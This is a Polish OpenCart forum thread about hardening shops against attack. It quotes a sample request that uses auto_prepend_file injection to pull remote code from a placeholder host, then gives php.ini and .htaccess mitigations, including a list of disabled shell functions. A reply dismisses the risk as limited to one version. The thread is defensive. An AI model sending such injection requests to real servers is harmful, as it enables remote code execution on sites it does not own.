Zabezpieczenia...

Miejsce na wszelkie dyskusje odnośnie problemów technicznych i ewentualnych pytań z rozbudowaniem systemu w plikach i skryptach Opencart, a które nie dotyczą instalacji.

Zabezpieczenia...

Postprzez PiterEL » 6 mar 2013, o 15:44

Witam
Znalazłem na forum opencart taki post:
Kod: Zaznacz cały
Witam

Właśnie dołączyłem do grona użytkowników zbanowanych i usuniętych z forum.opencart.com za ujawnienie podatności OC na atak i podanie zmian koniecznych do lepszego zabezpieczenia OC.
Rady zostały usunięte z głównego forum i nie poprawiono dokumentacji. Może poniższe uwagi wam się pomogą.

Ostatnie ataki objawiają się zmodyfikowanymi przez robala plikami htaccess które cały ruch robotów wyszukiwarek przekierowują na strony bandytów.

Poniżej zabezpieczenia przed atakami typu
# wstrzyknięcie exploita przez dauto_prepend_file
GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://wsdsf..fffm/a.txt'
# wstrzyknięcie exploita przez eval
POST /config.php?w1566t=1
Więcej na http://blog.spiderlabs.com

Niezbędne korekty

dodatki do php.ini
allow_url_fopen = Off;
allow_url_include = Off;
#disable injection
auto_prepend_file =none;
expose_php = Off;
display_errors = Off;
display_startup_errors = Off ;
register_globals = Off;
#add eval to list
disable_functions = exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl;

dodatki do .htaccess
#Block access to configuration files like config.php, set chmod 444 too.
<FilesMatch "config.php">
Order deny,allow
Deny from all
</FilesMatch>

# Use this rule if you can't configure apache or php.ini
RewriteCond %{QUERY_STRING} auto_prepend_file
RewriteRule ^(.*)$ - [F,L]

Oczywiście najleszym sposobem jest odfiltrowanie calego ruchu z 'dauto_prepend_file' w nagłówkach i załatanie php.



Czy trzeba to wykonać aby zabezpieczyc sklep ? wersja 1.5.5.1
link do posta:http://forum.opencart.com/viewtopic.php?f=164&t=64712
PiterEL
 
Posty: 151
Dołączył(a): 17 lut 2013, o 23:21

Re: Zabezpieczenia...

Postprzez schematx.pl » 6 mar 2013, o 18:04

ten explit działał tylko na wersji 1.5.3.0 ale aktualnie strona z tym exploitem została już usunięta więc nie ma się czego obawiać
schematx.pl
 
Posty: 300
Dołączył(a): 21 sty 2013, o 20:11

Re: Zabezpieczenia...

Postprzez PiterEL » 6 mar 2013, o 18:32

Czyli jednym slowem zostawic na domyslnych ustawieniach...?
PiterEL
 
Posty: 151
Dołączył(a): 17 lut 2013, o 23:21

Re: Zabezpieczenia...

Postprzez schematx.pl » 6 mar 2013, o 20:49

tak
schematx.pl
 
Posty: 300
Dołączył(a): 21 sty 2013, o 20:11


Powrót do Pomoc techniczna przy Opencart

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 0 gości